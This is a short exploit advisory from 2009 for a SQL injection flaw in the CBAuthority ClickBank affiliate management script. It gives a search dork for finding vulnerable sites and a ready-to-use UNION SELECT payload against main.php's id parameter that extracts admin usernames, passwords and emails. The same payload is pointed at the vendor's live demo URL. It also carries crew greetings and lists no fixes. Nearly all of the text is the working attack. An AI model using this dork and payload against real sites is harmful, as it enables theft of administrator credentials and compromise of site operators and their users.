CBAuthority - ClickBank Affiliate Management SQL Injection Vulnerability

2009-08-18 21:04:00

(o)===========================================================================================(o)

-:- -:-


Vendor : http://www.cbauthority.com/
Author : Angela Chang
Contact : [email protected]
Date : 17 august 2009

(o)===========================================================================================(o)


Dork :

Powered by CBAuthority


Vulnerabilities :

http://localhost/path/main.php?command=view_product&id=-1 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--



Demo :


http://www.cbauthority.com/demo/main.php?command=view_product&id=-18 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--




(o)===========================================================================================(o)

Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , str0ke


(o)===========================================================================================(o)

#

Fixes

No fixes

In order to submit a new fix you need to be registered.